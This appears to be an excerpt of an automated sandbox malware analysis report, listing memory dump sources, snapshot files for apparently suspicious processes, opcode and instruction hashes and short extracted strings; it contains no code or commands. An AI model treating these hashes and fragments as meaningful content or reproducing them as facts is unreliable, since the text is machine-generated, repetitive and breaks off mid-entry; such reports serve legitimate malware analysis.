                                                                                                                    • Opcode Fuzzy Hash: ff9db1328dd0820f605e83d2476913640ea1a08715a42332031421fef53d6899
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 976be7f8def78b83ca5f031f87b57cc84e2e52635fdbd6518493c78f056b750e
                                                                                                                    • Instruction ID: 21a5a99be99967fa41ac57dd4af91fe4d88051023b8008d54d5f6399e21116a9
                                                                                                                    • Opcode Fuzzy Hash: 976be7f8def78b83ca5f031f87b57cc84e2e52635fdbd6518493c78f056b750e
                                                                                                                    • Instruction Fuzzy Hash: D6C08C309108088FC940E72EC88480032A0FB0E220BC100D0E00DC7170E21E9CC4CB00
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3ad9b737f9d3a71b5a47652e042b9bbfd47591b0a6598e927983330d6249448c
                                                                                                                    • Instruction ID: a50990506d9201a2f15d54500c1484066e0405552ff1ffe2eb2556d764c299cd
                                                                                                                    • Opcode Fuzzy Hash: 3ad9b737f9d3a71b5a47652e042b9bbfd47591b0a6598e927983330d6249448c
                                                                                                                    • Instruction Fuzzy Hash: 88C04C34A518098FCA48EB69C89591477A0FB1A215BD61190E409C7271E65DDCD5D741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4621070301.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34950000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3cca35076f2ca850bc219725a7a6ac76ee1cff21213c2fdf1b7e35ffc0cb905c
                                                                                                                    • Instruction ID: 98699523da72ce2c94d24a8d381068bd610586208b036059286f63a408483cf1
                                                                                                                    • Opcode Fuzzy Hash: 3cca35076f2ca850bc219725a7a6ac76ee1cff21213c2fdf1b7e35ffc0cb905c
                                                                                                                    • Instruction Fuzzy Hash: E3D09214B1D55F85F679860241B023D25A15F42300EB004FEC29FC18C9C91DB9217722
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4621070301.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34950000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 806bd5350af2c5d9d8229089b3c936f36bad06961f7b08ab37019a01ed309f53
                                                                                                                    • Instruction ID: 3b3165b16412febe614d8c966c7c2bb598044534f0f889ae6ea1c593ca011f94
                                                                                                                    • Opcode Fuzzy Hash: 806bd5350af2c5d9d8229089b3c936f36bad06961f7b08ab37019a01ed309f53
                                                                                                                    • Instruction Fuzzy Hash: 9BD0C914B0C60385F53A560641F023E63905F0BB00EB450BDC39FC1CD9CD2DB8027622
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4621070301.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34950000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7164194e321ff11a9c5b58660fdeb581821e2c8107603c55c42c51c06a3cb97c
                                                                                                                    • Instruction ID: 446dc2cdf3385261861c0994a07543551bc292da366fefb59afa80444266e8e6
                                                                                                                    • Opcode Fuzzy Hash: 7164194e321ff11a9c5b58660fdeb581821e2c8107603c55c42c51c06a3cb97c
                                                                                                                    • Instruction Fuzzy Hash: F5C002207588559FD698DB09C0E9A3872D1EF4A301FA040B8E54ACB2A9C92CA845A620
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: be55222d62812793089b4d9ae221bd1b59d3d020677999fefdfbd6630d1eed8f
                                                                                                                    • Instruction ID: e89131ced93b6e75b83c2327753c1158d014309e8f14d425a3756a2cdc90dfe2
                                                                                                                    • Opcode Fuzzy Hash: be55222d62812793089b4d9ae221bd1b59d3d020677999fefdfbd6630d1eed8f
                                                                                                                    • Instruction Fuzzy Hash: AFC08C01F0C85B02F12A2384403127D84026B40304F800074E00DD62C6CC5C9F0243C6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4621070301.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34950000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0a76bd5a74ab1f8a1098f3c579cdb005e5067301a7bcccf30f519f858386f14f
                                                                                                                    • Instruction ID: 66b53eef698f94282e20b3a875eea175335099fbb4d83cd0c5d832e15c4d7898
                                                                                                                    • Opcode Fuzzy Hash: 0a76bd5a74ab1f8a1098f3c579cdb005e5067301a7bcccf30f519f858386f14f
                                                                                                                    • Instruction Fuzzy Hash: 26C08C20E0C20B8FF226871180B12393B619F43340F7040FEC54ECA4EACE2C3A21B722
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4621070301.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34950000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 55cc0f958a01d8764d0302be527d63ca8d49c3b2f5153660c1605ae2fd82be13
                                                                                                                    • Instruction ID: 9219fdcd3e2cf3b92ec129ea036fcea4747eb9a4b71bb52aadd1c0a0cdd48018
                                                                                                                    • Opcode Fuzzy Hash: 55cc0f958a01d8764d0302be527d63ca8d49c3b2f5153660c1605ae2fd82be13
                                                                                                                    • Instruction Fuzzy Hash: CDC08C20A0C2038FF226931580B123637609F0B780F3080FDC64ECA8EACD2CB902B722
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                                                                                                    • Instruction ID: b3c5cdccc0aa1ee8565224c2d76708e0fed1863bf9f8249f2238a3161b01cd25
                                                                                                                    • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                                                                                                    • Instruction Fuzzy Hash: 88B01200D6640F00A40A357A08D20A470405B46120FC02070D60CC1081988D10942242
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4621070301.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34950000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bfb44ebc6fdf36d7ea19c209bdb1e86770482ece3614c54f6f25e2213c05665e
                                                                                                                    • Instruction ID: a5aebb02cd1855248427fb4164070f8448e09bc910ddfee5cb332e27c36b1e67
                                                                                                                    • Opcode Fuzzy Hash: bfb44ebc6fdf36d7ea19c209bdb1e86770482ece3614c54f6f25e2213c05665e
                                                                                                                    • Instruction Fuzzy Hash: 9DC04840F0D3575AE66615B008B403824A10F07291BA609FAD35ACA2E7EC8C6D8962B5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34570000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: L_^$$L_^%$L_^1$L_^9$L_^:$^+=$#<L
                                                                                                                    • API String ID: 0-4271824446
                                                                                                                    • Opcode ID: b34310fa1fc0c123ab2ee53f33e57d96bf9007b256c182c9725413568574c979
                                                                                                                    • Instruction ID: 362b89c93282e4a0fc2b586642626d1c8581a31cd0c0734f6ce42700a835332e
                                                                                                                    • Opcode Fuzzy Hash: b34310fa1fc0c123ab2ee53f33e57d96bf9007b256c182c9725413568574c979
                                                                                                                    • Instruction Fuzzy Hash: C571E917B0C5222AD92977ED78620FF7748DF91379B184677E28CA90A34D18F8C245D6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34570000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: L_^$$L_^%$L_^1$L_^9$L_^:$^+=$#<L
                                                                                                                    • API String ID: 0-4271824446
                                                                                                                    • Opcode ID: 230673a9c5e27a90f079f00ef638b592d3d03742240a7f1810d7f83d4348c3ca
                                                                                                                    • Instruction ID: d77be82bacd0cfb6302ea27809dde9b24e51198c4de67680d41ce0311e0b4110
                                                                                                                    • Opcode Fuzzy Hash: 230673a9c5e27a90f079f00ef638b592d3d03742240a7f1810d7f83d4348c3ca
                                                                                                                    • Instruction Fuzzy Hash: 73517557F0C52626E92937EC38A60FF6748DFA1379B189677E24DA80A34D1CECC241D9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000018.00000002.4614685322.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_24_2_7ffd34570000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: =L_^$L_^+$L_^1$L_^9$L_^:$^+=$#<L
                                                                                                                    • API String ID: 0-1802454848
                                                                                                                    • Opcode ID: 915d380f74688abbd3bd571c83459c687468c841d5a0e5921064095303701577
                                                                                                                    • Instruction ID: 8e5d385fb794a36892cc1e09d1c1497468d0cf48f766087935c672a262fa8820
                                                                                                                    • Opcode Fuzzy Hash: 915d380f74688abbd3bd571c83459c687468c841d5a0e5921064095303701577
                                                                                                                    • Instruction Fuzzy Hash: 9D516D17B0C52626E92937FD38A60FF6708DFA1379B089677E20DA80A34D1CEC8241D9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2382409923.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5Y_H
                                                                                                                    • API String ID: 0-3237497481
                                                                                                                    • Opcode ID: 7cdad48d862a893f49830c950a675f79a52fc0858645b841325c59409642340d
                                                                                                                    • Instruction ID: 7f069677219a3a553fa683c2935bc70bb6d8bae6629b5707489e194a670af7f5
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                                                                                                    • Instruction ID: b3c5cdccc0aa1ee8565224c2d76708e0fed1863bf9f8249f2238a3161b01cd25
                                                                                                                    • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                                                                                                    • Instruction Fuzzy Hash: 88B01200D6640F00A40A357A08D20A470405B46120FC02070D60CC1081988D10942242
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2382409923.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_7ffd34560000_AdbXCBUViTnoVBSsOq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                                                    • API String ID: 0-1692736845
                                                                                                                    • Opcode ID: 9bc2b293896c0baef41746b4921a91980c9f281a934a55c9448ee0fb6a910f5c
                                                                                                                    • Instruction ID: 7f7c9cd1ebcbb4773652999d575a23293d0b24c1fb6050a7d2b30b96cbfc5eb1
                                                                                                                    • Opcode Fuzzy Hash: 9bc2b293896c0baef41746b4921a91980c9f281a934a55c9448ee0fb6a910f5c
                                                                                                                    • Instruction Fuzzy Hash: BE419407F1D46B67EA2A37FD74611FE6B889FA2375B084377E14C990E34D0CA88582E5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5Y_H
                                                                                                                    • API String ID: 0-3237497481
                                                                                                                    • Opcode ID: 22d5aa4240c2d06ce25f161dc1babd447f9b7fa076488c09736abae15ab5bf01
                                                                                                                    • Instruction ID: 0d7a6c124fa4bb30a10ba1f1c9575ea556581adcfc6e2c382a70c64a525418ad
                                                                                                                    • Opcode Fuzzy Hash: 22d5aa4240c2d06ce25f161dc1babd447f9b7fa076488c09736abae15ab5bf01
                                                                                                                    • Instruction Fuzzy Hash: 1591D572A1CA998FE799DB6C88A57A97FE1FB56310F4402BAD049D72E2DF7D1800C700
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 56c3eae723d49ab7ba9e4c832991a03d1e3265d844378868f3c1985d4ab712f4
                                                                                                                    • Instruction ID: fa1945ab3431f7883eeec910ad59c85efda035f426f13613813227cc43e0a332
                                                                                                                    • Opcode Fuzzy Hash: 56c3eae723d49ab7ba9e4c832991a03d1e3265d844378868f3c1985d4ab712f4
                                                                                                                    • Instruction Fuzzy Hash: EED16C25E2D6A60BF32E492848A31B577A1EB93205B2D53BDCEDBC75C7DC1C680792C1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 17d228ab5f6af5de8d42cc1cab218942b3ed6e5c873c181b82b300759464fb3f
                                                                                                                    • Instruction ID: 0d9e2149e75c0619702a85af6a73f5bc8e1223d693756be6875e49a5b5dba220
                                                                                                                    • Opcode Fuzzy Hash: 17d228ab5f6af5de8d42cc1cab218942b3ed6e5c873c181b82b300759464fb3f
                                                                                                                    • Instruction Fuzzy Hash: 0E51C172A18A5A8EE798DF5C88A57A9BFD1FB96320F4002BED049D77D1DBB91411C700
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: *`4$HIa4$PXa4$P\a4$pqa4$wa4
                                                                                                                    • API String ID: 0-3421069954
                                                                                                                    • Opcode ID: edd1dd5c5ea5b1b0628afcb3ae25f2a5457a88fc82449f5fe66891141076ac5d
                                                                                                                    • Instruction ID: aa736826f0a8059433f1aa5750e5f45f2c7c8f3770f6e02564e07edced19a50a
                                                                                                                    • Opcode Fuzzy Hash: edd1dd5c5ea5b1b0628afcb3ae25f2a5457a88fc82449f5fe66891141076ac5d
                                                                                                                    • Instruction Fuzzy Hash: 4A62C221F1C91A4BEB99EB2C88E66B877D2FF95350F0445B9D10DD3292DE2CBC819B41
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: P\a4$wa4
                                                                                                                    • API String ID: 0-1460514738
                                                                                                                    • Opcode ID: b97b6dfdeb44d52f7de8e4c65c897a987f59e99a7846baede782048e2ef77c93
                                                                                                                    • Instruction ID: b4fe74e86620093e188b58040f647469ebb9442d6fd988a4c0098000bcd87208
                                                                                                                    • Opcode Fuzzy Hash: b97b6dfdeb44d52f7de8e4c65c897a987f59e99a7846baede782048e2ef77c93
                                                                                                                    • Instruction Fuzzy Hash: B8919131F1C90A4BEB99EF2888E167877E2FF95310F5445B9D04ED3282DE2CAC429B41
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @aD4
                                                                                                                    • API String ID: 0-1189369986
                                                                                                                    • Opcode ID: e00c8f75306acc8ed76c4a5a66831b5e760a8a5d0d18f7665462425984e69e05
                                                                                                                    • Instruction ID: b9c65bd4fa050a338c83a5995d978e30df5a58d65e3524e6fa9910025258a633
                                                                                                                    • Opcode Fuzzy Hash: e00c8f75306acc8ed76c4a5a66831b5e760a8a5d0d18f7665462425984e69e05
                                                                                                                    • Instruction Fuzzy Hash: 3291D421F1C94A4FEB9DEB2884B627576E1EFAA300F0441BAE54DC72C7DD2CAC459781
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 87a4
                                                                                                                    • API String ID: 0-1756189204
                                                                                                                    • Opcode ID: 5f746f33a5758263a12db587e667834e1da6f90c70b4e2d9c5dcba44f53ee52c
                                                                                                                    • Instruction ID: f0295385888bc102a9139df7fa104940b9bb97b0f43e05e54361d102ad45afd9
                                                                                                                    • Opcode Fuzzy Hash: 5f746f33a5758263a12db587e667834e1da6f90c70b4e2d9c5dcba44f53ee52c
                                                                                                                    • Instruction Fuzzy Hash: 2E212821B5C9194FF788FB2C80AA6B577C6DB99331F5000B9E40DC32E3DE2CAC818681
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: H
                                                                                                                    • API String ID: 0-2852464175
                                                                                                                    • Opcode ID: 00aa83b5a87cb196ae42f3845d0f9fe301abbad2ab879674af1d5776a6999ea8
                                                                                                                    • Instruction ID: 02d4b6ffe16e02470cd91f550bd0a0de1a727a5c83d3796cc7f72ecf5798393d
                                                                                                                    • Opcode Fuzzy Hash: 00aa83b5a87cb196ae42f3845d0f9fe301abbad2ab879674af1d5776a6999ea8
                                                                                                                    • Instruction Fuzzy Hash: 99019A31F0851A8BEB999A18D4A53FD73E1EF85300F440039E209D72C1CE2CA888C780
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: 3cdca01616814c9c0517f5651d5cb60281db3131add8036b17ac6baf02edda43
                                                                                                                    • Instruction ID: c37388d79ee6114d04c95b876a493dd134dbb7c64b203bbb288356bb706e655f
                                                                                                                    • Opcode Fuzzy Hash: 3cdca01616814c9c0517f5651d5cb60281db3131add8036b17ac6baf02edda43
                                                                                                                    • Instruction Fuzzy Hash: 94F0656190E7C44FCB16DA3888694557FA0EF6720174A52EEC045CF1A3EA1DD885C711
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: caec905013c34235ab15f3c7ddfec50e83176b344827737a1c9c8424fca9d588
                                                                                                                    • Instruction ID: f30fcbc5a71dba2870769358b87ffc4f3834dd58e6427fa43758bd00718690f9
                                                                                                                    • Opcode Fuzzy Hash: caec905013c34235ab15f3c7ddfec50e83176b344827737a1c9c8424fca9d588
                                                                                                                    • Instruction Fuzzy Hash: 0EF06D61A0E3C44FCB16AA348869455BFA0EF6721174A51EFC046CF1A3EA2D8889C701
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: d71f91e2e835abecfea5e4f0ba85d64d0e321eb78f78bf8e6aa98e64a2dbe1d2
                                                                                                                    • Instruction ID: a6a1eaa30195cba23ff3e19a8bc8304a73dd5d9be99fdba7f704f2fcb5a50227
                                                                                                                    • Opcode Fuzzy Hash: d71f91e2e835abecfea5e4f0ba85d64d0e321eb78f78bf8e6aa98e64a2dbe1d2
                                                                                                                    • Instruction Fuzzy Hash: ADE0657190E7C04FC716963888684547FA0EF6721174A41EEC145CF1A3DA2D8885CB01
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • Opcode Fuzzy Hash: 1148d6377518ce851e27891ff249282026dafd9fb6c473c557b6f80bfa0906b1
                                                                                                                    • Instruction Fuzzy Hash: CA015A35E0D3899FEB12DB6888A409DBFB0AF03320F1451E6C544DB192EA3C5A44E741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1a3e1c098371154e84161bfe5def8e367da0d0abf3e15046623435b37b434a1b
                                                                                                                    • Instruction ID: 8763f95ddf90e4aea5c17e129fe925895bd5189fe5287db146f6a03a5ebaa79a
                                                                                                                    • Opcode Fuzzy Hash: 1a3e1c098371154e84161bfe5def8e367da0d0abf3e15046623435b37b434a1b
                                                                                                                    • Instruction Fuzzy Hash: 17F05431F0C4294AEB96EA14D8A46B86391EF57331F1421B9D94ED31D2CE2C6D835648
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e2284ba2e2f83360b54e2af326e0c6aeca67fbee903495846284ba7d7edba427
                                                                                                                    • Instruction ID: 53ad634fe0f8278ef28ac9545c6f2c0681dfdd970f46db38c0805c17f98cb0a3
                                                                                                                    • Opcode Fuzzy Hash: e2284ba2e2f83360b54e2af326e0c6aeca67fbee903495846284ba7d7edba427
                                                                                                                    • Instruction Fuzzy Hash: 80F0E521B0CBC40FC76A963D48A50617FF1DB9B21234A02FFC586CB2A3ED58EC868341
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c3e7b14d706b0bb96c290e7903d6db0490709abddbd41da37acc68952f82bbc0
                                                                                                                    • Instruction ID: 58ead995a69b421613d6428f87f2f335a6dfe4ccacc121e5ab5997ab40af4249
                                                                                                                    • Opcode Fuzzy Hash: c3e7b14d706b0bb96c290e7903d6db0490709abddbd41da37acc68952f82bbc0
                                                                                                                    • Instruction Fuzzy Hash: CEF03730F0C5178BE71A9A089C906B57292FF57312B118175D59AC21CADE3CE851A784
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0fa61e1bc2d34c25b291fb6c8e3c7e53dd1c83a71e6d7df43dcb9f134149b047
